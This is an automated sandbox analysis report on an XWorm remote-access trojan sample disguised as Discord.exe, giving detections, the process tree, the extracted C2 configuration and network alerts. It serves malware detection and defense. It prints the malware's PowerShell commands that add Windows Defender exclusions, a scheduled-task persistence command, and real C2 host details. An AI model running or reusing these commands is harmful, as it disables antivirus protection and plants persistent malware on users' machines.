Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
s3OBQLA3xR.exe

Overview

General Information

Sample name:s3OBQLA3xR.exe
renamed because original name is a hash value
Original sample name:2b2a240fbda2933b546a6d1b495d21878b9bf67da1c7e5b4cad29c8b82c5d706.exe
Analysis ID:1532616
MD5:8090c678b1ab88d330d94a8012682263
SHA1:062e28c4a590a278ceff6a3931498d53db6812ec
SHA256:2b2a240fbda2933b546a6d1b495d21878b9bf67da1c7e5b4cad29c8b82c5d706
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • s3OBQLA3xR.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\s3OBQLA3xR.exe" MD5: 8090C678B1AB88D330D94A8012682263)
    • powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 's3OBQLA3xR.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7540 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Discord.exe (PID: 7560 cmdline: C:\Users\user\AppData\Roaming\Discord.exe MD5: 8090C678B1AB88D330D94A8012682263)
  • Discord.exe (PID: 1800 cmdline: C:\Users\user\AppData\Roaming\Discord.exe MD5: 8090C678B1AB88D330D94A8012682263)
  • Discord.exe (PID: 7944 cmdline: "C:\Users\user\AppData\Roaming\Discord.exe" MD5: 8090C678B1AB88D330D94A8012682263)
  • Discord.exe (PID: 7820 cmdline: "C:\Users\user\AppData\Roaming\Discord.exe" MD5: 8090C678B1AB88D330D94A8012682263)
  • Discord.exe (PID: 6100 cmdline: C:\Users\user\AppData\Roaming\Discord.exe MD5: 8090C678B1AB88D330D94A8012682263)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["methods-availability.gl.at.ply.gg"], "Port": "20557", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
s3OBQLA3xR.exeJoeSecurity_XWormYara detected XWormJoe Security
    s3OBQLA3xR.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      s3OBQLA3xR.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xde71:$s6: VirtualBox
      • 0xddcf:$s8: Win32_ComputerSystem
      • 0x10099:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x10136:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x1024b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xf58b:$cnc4: POST / HTTP/1.1

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\Discord.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\Discord.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Roaming\Discord.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xde71:$s6: VirtualBox
          • 0xddcf:$s8: Win32_ComputerSystem
          • 0x10099:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x10136:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x1024b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xf58b:$cnc4: POST / HTTP/1.1

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xd8e9:$s6: VirtualBox
            • 0xd847:$s8: Win32_ComputerSystem
            • 0xfb11:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xfbae:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xfcc3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xf003:$cnc4: POST / HTTP/1.1
            00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xdc71:$s6: VirtualBox
                • 0xdbcf:$s8: Win32_ComputerSystem
                • 0xfe99:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xff36:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x1004b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xf38b:$cnc4: POST / HTTP/1.1
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.s3OBQLA3xR.exe.860000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.0.s3OBQLA3xR.exe.860000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.0.s3OBQLA3xR.exe.860000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xde71:$s6: VirtualBox
                    • 0xddcf:$s8: Win32_ComputerSystem
                    • 0x10099:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x10136:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x1024b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0xf58b:$cnc4: POST / HTTP/1.1

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s3OBQLA3xR.exe", ParentImage: C:\Users\user\Desktop\s3OBQLA3xR.exe, ParentProcessId: 7352, ParentProcessName: s3OBQLA3xR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', ProcessId: 7476, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s3OBQLA3xR.exe", ParentImage: C:\Users\user\Desktop\s3OBQLA3xR.exe, ParentProcessId: 7352, ParentProcessName: s3OBQLA3xR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', ProcessId: 7476, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Discord.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\s3OBQLA3xR.exe, ProcessId: 7352, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Discord
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s3OBQLA3xR.exe", ParentImage: C:\Users\user\Desktop\s3OBQLA3xR.exe, ParentProcessId: 7352, ParentProcessName: s3OBQLA3xR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', ProcessId: 7476, ProcessName: powershell.exe
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\s3OBQLA3xR.exe, ProcessId: 7352, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\s3OBQLA3xR.exe", ParentImage: C:\Users\user\Desktop\s3OBQLA3xR.exe, ParentProcessId: 7352, ParentProcessName: s3OBQLA3xR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe", ProcessId: 7540, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s3OBQLA3xR.exe", ParentImage: C:\Users\user\Desktop\s3OBQLA3xR.exe, ParentProcessId: 7352, ParentProcessName: s3OBQLA3xR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe', ProcessId: 7476, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T18:53:03.649760+020028528701Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    2024-10-13T18:53:06.230258+020028528701Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    2024-10-13T18:53:18.164978+020028528701Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    2024-10-13T18:53:30.105647+020028528701Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    2024-10-13T18:53:33.655222+020028528701Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    2024-10-13T18:53:42.035887+020028528701Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    2024-10-13T18:53:53.980479+020028528701Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    2024-10-13T18:53:58.194733+020028528701Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    2024-10-13T18:54:00.345370+020028528701Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    2024-10-13T18:54:00.560207+020028528701Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    2024-10-13T18:54:01.284864+020028528701Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    2024-10-13T18:54:03.650096+020028528701Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    2024-10-13T18:54:10.359906+020028528701Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T18:53:06.231787+020028529231Malware Command and Control Activity Detected192.168.2.449739147.185.221.2320557TCP
                    2024-10-13T18:53:18.172927+020028529231Malware Command and Control Activity Detected192.168.2.449739147.185.221.2320557TCP
                    2024-10-13T18:53:30.108364+020028529231Malware Command and Control Activity Detected192.168.2.449739147.185.221.2320557TCP
                    2024-10-13T18:53:42.037340+020028529231Malware Command and Control Activity Detected192.168.2.449739147.185.221.2320557TCP
                    2024-10-13T18:53:53.982449+020028529231Malware Command and Control Activity Detected192.168.2.449739147.185.221.2320557TCP
                    2024-10-13T18:53:58.197296+020028529231Malware Command and Control Activity Detected192.168.2.449739147.185.221.2320557TCP
                    2024-10-13T18:54:00.347724+020028529231Malware Command and Control Activity Detected192.168.2.449739147.185.221.2320557TCP
                    2024-10-13T18:54:00.563723+020028529231Malware Command and Control Activity Detected192.168.2.449739147.185.221.2320557TCP
                    2024-10-13T18:54:01.289531+020028529231Malware Command and Control Activity Detected192.168.2.449739147.185.221.2320557TCP
                    2024-10-13T18:54:10.360654+020028529231Malware Command and Control Activity Detected192.168.2.449739147.185.221.2320557TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T18:53:03.649760+020028528741Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    2024-10-13T18:53:33.655222+020028528741Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    2024-10-13T18:54:03.650096+020028528741Malware Command and Control Activity Detected147.185.221.2320557192.168.2.449739TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-13T18:53:17.851676+020028559241Malware Command and Control Activity Detected192.168.2.449739147.185.221.2320557TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: s3OBQLA3xR.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Discord.exeAvira: detection malicious, Label: TR/Spy.Gen
                    Found malware configuration
                    Source: s3OBQLA3xR.exeMalware Configuration Extractor: Xworm {"C2 url": ["methods-availability.gl.at.ply.gg"], "Port": "20557", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Discord.exeReversingLabs: Detection: 76%
                    Source: C:\Users\user\AppData\Roaming\Discord.exeVirustotal: Detection: 65%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: s3OBQLA3xR.exeReversingLabs: Detection: 76%
                    Source: s3OBQLA3xR.exeVirustotal: Detection: 65%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Discord.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: s3OBQLA3xR.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: s3OBQLA3xR.exeString decryptor: methods-availability.gl.at.ply.gg
                    Source: s3OBQLA3xR.exeString decryptor: 20557
                    Source: s3OBQLA3xR.exeString decryptor: <123456789>
                    Source: s3OBQLA3xR.exeString decryptor: <Xwormmm>
                    Source: s3OBQLA3xR.exeString decryptor: XWorm V5.2
                    Source: s3OBQLA3xR.exeString decryptor: USB.exe
                    Source: s3OBQLA3xR.exeString decryptor: %AppData%
                    Source: s3OBQLA3xR.exeString decryptor: Discord.exe
                    Source: s3OBQLA3xR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: s3OBQLA3xR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.23:20557 -> 192.168.2.4:49739
                    Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 147.185.221.23:20557 -> 192.168.2.4:49739
                    Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49739 -> 147.185.221.23:20557
                    Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49739 -> 147.185.221.23:20557
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: methods-availability.gl.at.ply.gg
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: s3OBQLA3xR.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPED
                    Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.185.221.23:20557
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 147.185.221.23 147.185.221.23
                    Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                    Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: methods-availability.gl.at.ply.gg
                    Source: powershell.exe, 00000001.00000002.1792186081.00000239CFA10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsK_o
                    Source: powershell.exe, 00000004.00000002.1877930359.000001ADB22E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso?
                    Source: powershell.exe, 00000004.00000002.1877930359.000001ADB22E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoo
                    Source: s3OBQLA3xR.exe, Discord.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: powershell.exe, 00000001.00000002.1784597274.00000239C73F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1862924961.000001ADA9CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2003513944.0000021BE28E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000001.00000002.1766087505.00000239B75A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99E5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2A98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: s3OBQLA3xR.exe, 00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1766087505.00000239B7381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.0000022956EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000001.00000002.1766087505.00000239B75A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99E5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2A98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000001.00000002.1766087505.00000239B7381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.0000022956EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
